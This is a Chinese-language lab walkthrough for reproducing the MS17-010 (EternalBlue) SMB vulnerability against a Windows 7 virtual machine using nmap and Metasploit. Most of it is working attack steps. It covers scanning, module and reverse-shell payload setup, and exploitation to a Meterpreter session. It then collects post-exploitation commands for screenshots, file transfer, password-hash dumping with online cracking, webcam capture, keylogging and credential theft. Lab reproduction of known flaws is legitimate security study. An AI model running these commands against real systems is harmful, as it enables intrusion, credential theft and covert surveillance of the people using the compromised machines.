MS17-010漏洞复现

news2024/11/14 11:22:38

官方描述：Microsoft Security Bulletin MS17-010 - Critical | Microsoft Learn
漏洞描述：
- Microsoft Windows SMB Server远程代码执行漏洞，Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时，在实现上存在远程代码执行漏洞，成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败，会导致拒绝服务，对业务造成一定安全风险。
涉及系统版本
- Microsoft Windows Server 2016、Microsoft WindowsServer 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft WindowsServer 2008、Microsoft Windows RT 8.1等等
漏洞复现：
- 工具资料准备
  - kali系统
  - nmap、msf
  - vmware
  - win7 靶机
- 复现过程
  - 1.登录kali，切换root
  - 查看当前所处网段
  - 查看win7的IP以及kali和win7的联通情况
    - ipconfig
    - ping 192.168.24.129
  - 使用nmap扫描win7:
    - nmap -T4 -A -v -Pn 192.168.24.129
    - 发现445端口开启状态
  - 启用msf:
    - msfconsole
  - 搜索漏洞：
    - search ms17-010
    - 显示如下模块：
    - 字段说明
      - name:模块名
        exploit攻击模块
        
        auxiliary辅助扫描模块
      - disclosure Date：漏洞纰漏时间
      - Rank：可靠性等级
      - check:该模块是否支持漏洞检测
      - description：漏洞或模块的详细介绍
  - 使用永恒之蓝模块并配置参数
    - use 0
    - 会出现如下图提示，没有荷载，默认使用window/x64/meterpreter/reverse_tcp荷载，设置荷载，设置受害者主机以及服务主机如下图：
    - 也可以通过show playloads 命令查看当前模块所有的攻击载荷
  - 配置完使用show options 查看配置参数
    - 可以看到受害主机192.168.24.129，端口445
    - 以及服务主机信息
  - 渗透
    - 渗透成功，提示目标主机 Meterpreter session 1 opened
    - 获取受害者系统桌面快照使用screenshot
    - 打开图片
    - 将图片上传到C盘目录下使用 upload /home/kali/AKEZNoiU.jpeg C:\\heihei.jpeg
    - 切换到win7,查看对应目录
    - 下载图片到kali桌面
    - 如图
    - 查看win7用户权限 getuid
      - Windows命令为：getuid
      - Linux命令为：whoami
      - 发现当前为管理员权限
    - 进入shell
    - 可以利用shell对账号进行提权
  - - 获取账号密码 hashdump
    - 通过md5解析网站获取密码明文
    - md5在线解密破解,md5解密加密 (cmd5.com)
  - 后渗透命令收集：
    - screenshot //桌面截图
    - shell //进入的就是DOS系统受害者win7的cmd命令行
    - chcp 65001 //改变编码方式，改乱码
    - whoami //查看受害者当前用户及权限
    - windows系统最高权限：system(系统权限)
    - 从命令行退回
      - meterpreter:exit
      - ctrl+c
    - 拍照：
      - webcam_list //检测摄像头设备
      - webcam_snap //拍照
      - webcam_stream //摄影，视频
    - 键盘监听：
      - ps //查看windows系统运行进程
      - migrate -P 进程的PID
      - keyscan_start //开始监听
      - keyscan_dump //获取监听
      - keyscan_stop //停止监听
    - 抓取密码：
      - hashdump //抓取加密之后的密码
      - 加密方式：MD5 在线解密网站：https://www.cmd5.com/
      - creds_wdigest //工具kiwi抓取密码的命令
        如图